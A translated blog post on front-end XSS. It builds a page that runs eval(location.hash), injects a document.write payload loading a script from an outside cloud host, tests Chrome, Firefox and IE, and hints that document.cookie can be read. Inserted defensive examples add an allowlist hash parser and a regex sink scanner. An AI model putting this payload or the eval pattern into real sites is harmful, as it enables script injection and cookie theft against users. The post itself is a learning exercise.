I had heard about XSS before, but yesterday, while working through "NodeJS in A Simple Way", I learned how an XSS attack actually works. So I dug out the book "Web Front-end Hacking Technology Decryption", which I had wanted to read for a long time, found the XSS attack script in its XSS chapter, and ran the following simple XSS experiment.

#### index.html
```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>XSSdemo</title>
</head>
<!-- The vulnerable line: whatever follows '#' in the URL is run as JavaScript -->
<script>
  eval(location.hash.substr(1))
</script>
<body>
</body>
</html>
```
Key code: `eval(location.hash.substr(1))`
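For contrast with the demo page's `eval(location.hash.substr(1))`, the following is an added example, not code from the original post or from either book. It shows how a page can react to the URL fragment without ever treating it as code: the fragment is data that selects a view from a fixed allowlist. The view names, the `view=` prefix and the `app` element id are assumptions made for the illustration.

```javascript
// Added example: hardened replacement for eval(location.hash.substr(1)).
// Not part of the original post. The fragment is treated as data, never as code.

// The only views this page knows about (assumed names for the example).
const ALLOWED_VIEWS = new Set(['home', 'about', 'contact']);

// Parse "#about" or "#view=about" into a view name.
// Returns null for anything that is not exactly one allowlisted identifier.
function viewFromHash(hash) {
  if (typeof hash !== 'string' || !hash.startsWith('#')) return null;

  let fragment;
  try {
    // Firefox percent-encodes spaces etc. in location.hash; decode once.
    fragment = decodeURIComponent(hash.slice(1));
  } catch (e) {
    return null; // malformed percent-encoding: treat as "no view"
  }

  const value = fragment.startsWith('view=') ? fragment.slice('view='.length) : fragment;

  // Strict identifier check before the lookup, so a payload such as
  // document.write("<script/src=...>") can never match anything.
  if (!/^[a-z][a-z0-9-]{0,31}$/.test(value)) return null;

  return ALLOWED_VIEWS.has(value) ? value : null;
}

// If a fragment value ever has to be shown to the user, insert it as text.
// In the browser prefer element.textContent; this helper covers the rare
// case where an HTML string has to be assembled by hand.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Browser glue. Skipped under Node, where there is no `location`/`document`.
if (typeof location !== 'undefined' && typeof document !== 'undefined') {
  const render = () => {
    const view = viewFromHash(location.hash) || 'home';
    // textContent, never innerHTML or document.write: the value is text, not markup.
    document.getElementById('app').textContent = `view: ${view}`;
  };
  window.addEventListener('hashchange', render);
  render();
}
```

The demo's `document.write(...)` payload fails the identifier check and is dropped; an unknown but well-formed name such as `#admin` is dropped by the allowlist. Even an accepted value only ever reaches the page through `textContent`, so nothing taken from the URL is parsed as HTML or executed as script.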
#### xss.js (the XSS attack script, hosted on Qiniu Cloud at ov6jc8fwp.bkt.clouddn.com/xss.js)
```javascript
alert("Your website has been attacked by XSS!")
```
Key code: `alert("Your website has been attacked by XSS!")`. Cookies are a common entry point: `escape(document.cookie)` can be used to read sensitive information stored in the user's cookie, such as phone numbers and passwords.
##### How is the attack carried out?
Append the hash value `#document.write("<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>")` to the URL of the page being accessed.

For example:

```
file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write("<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>")
```

In the real world, the `file:///C:/Users/jack/Desktop/XSSdemo/` part would be a real address such as `http://192.168.32.89:80/` or `http://192.16.32.89:8080/`. The complete form would then be, for example:

```
http://192.16.32.89:8080/index.html#document.write("<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>")
```
##### Can Chrome be attacked?

Enter the following in Chrome:

```
file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write("<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>")
```

It is blocked by Chrome, as the screenshot below shows:

Why is it blocked? Chrome's XSS filter recognises the injection and stops it from working; other browsers can still be attacked.
##### So how do you attack Firefox? (Firefox 57.0 Quantum)

A small tweak to the original attack code is needed:

```javascript
eval(decodeURI(location.hash.substr(1)))
```

The access link changes accordingly to:

```
file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write("<script/src=http://ov6jc8fwp.bkt.clouddn.com/xss.js>")
```

The XSS attack on Firefox succeeds! As you can see, the XSS script was written into index.html.
##### Can IE be attacked? (Internet Explorer 11.726.15063.0)

The XSS attack on Internet Explorer 11 succeeds!
After all this attacking, am I going to go and hack someone else's site? No, no, no: I am trying to make my own site more secure.
eval() can be abused in an XSS attack because it executes whatever string it is given. In this case the input point is `location.hash.substr(1)`, whose value is `document.write("<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>")`.

So `eval(decodeURI(location.hash.substr(1)))` is really executing `eval('document.write("<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>")')`.
Simply put, eval() executes XSS cross-site attack scripts. Front-end engineers should be aware of the security risks associated with eval() during development.
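As a defender's aid for the lesson above, here is an added example (not from the original post) of a minimal source-to-sink check that flags lines like the demo's `eval(location.hash.substr(1))` in JavaScript source before they ship. The sample source it scans is constructed for the example, and the source and sink lists cover the common DOM XSS cases rather than being exhaustive.

```javascript
// Added example, not from the original post: a minimal source-to-sink check
// for the eval() pattern the post demonstrates. It scans JavaScript source
// text line by line and reports lines where a dangerous sink receives an
// expression that mentions attacker-controlled data.

// Where attacker-controlled data enters a page.
const SOURCES = [
  'location.hash', 'location.search', 'location.href',
  'document.URL', 'document.referrer', 'document.cookie', 'window.name',
];

// Sinks that turn a string into code or markup. Each pattern captures the
// argument text (for calls) or the right-hand side (for assignments).
const SINKS = [
  { name: 'eval',           re: /\beval\s*\(([^;]*)\)/ },
  { name: 'Function',       re: /\bnew\s+Function\s*\(([^;]*)\)/ },
  { name: 'setTimeout',     re: /\bset(?:Timeout|Interval)\s*\(([^,;]*),/ }, // string-argument form
  { name: 'document.write', re: /\bdocument\.write(?:ln)?\s*\(([^;]*)\)/ },
  { name: 'innerHTML',      re: /\.(?:inner|outer)HTML\s*=\s*([^;]*)/ },
];

// Return [{line, sink, source, text}] for every line on which a sink's
// argument mentions one of the sources. Lines are numbered from 1.
function findTaintedSinks(sourceText) {
  const findings = [];
  sourceText.split('\n').forEach((text, i) => {
    for (const sink of SINKS) {
      const m = sink.re.exec(text);
      if (!m) continue;
      const source = SOURCES.find((s) => m[1].includes(s));
      if (source) findings.push({ line: i + 1, sink: sink.name, source, text: text.trim() });
    }
  });
  return findings;
}

// Constructed sample: line 2 is the demo page's vulnerable call, line 3 its
// Firefox variant, lines 4-5 a safe use of the same source (textContent),
// lines 6-7 sinks fed by constants, line 8 a second tainted sink.
const SAMPLE = [
  '<script>',
  '  eval(location.hash.substr(1))',
  '  eval(decodeURI(location.hash.substr(1)))',
  '  var view = location.hash.slice(1);',
  '  document.getElementById("app").textContent = view;',
  '  setTimeout("tick()", 1000);',
  '  document.write("<p>static</p>");',
  '  el.innerHTML = decodeURIComponent(location.search);',
  '</script>',
].join('\n');

function runSample() {
  return findTaintedSinks(SAMPLE);
}

// Print the findings when run directly with Node.
if (typeof require !== 'undefined' && require.main === module) {
  for (const f of runSample()) {
    console.log(`line ${f.line}: ${f.sink} <- ${f.source}: ${f.text}`);
  }
}
```

Run against the sample, it reports lines 2, 3 and 8 and stays silent on the textContent assignment and the constant-fed sinks. A regex scan like this is triage, not a parser: it only sees flows that happen on one line, so it is a starting point for review rather than proof of safety. The real fix is to remove eval() and the string forms of setTimeout/Function, and, as defence in depth, a Content-Security-Policy without 'unsafe-eval' makes eval() throw regardless of its input. The browser filter that blocked the demo in Chrome (the XSS Auditor) was removed in Chrome 78, so the protection has to live in the page itself.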
As for browser preference: Chrome has earned a lot of points with me for its defence against XSS attacks, which gives me another reason to recommend Chrome in the future.
There is a lot of knowledge about XSS attacks, what I have learned is just the tip of the iceberg, and I will continue to explore!
That's it!
I look forward to exchanging ideas and making progress together. You are welcome to join the technical discussion groups I created, all closely related to front-end development:
- SegmentFault tech circle: ES new specification syntax sugar
- SegmentFault column: Be a good front-end engineer while you’re still young
- Zhihu column: Be an excellent front-end engineer while you are still young
- Github blog: Personal blog 233 while You’re Still Young
- Front-end development QQ group: 660634678
- excellent_developers
Strive to be an excellent front-end engineer!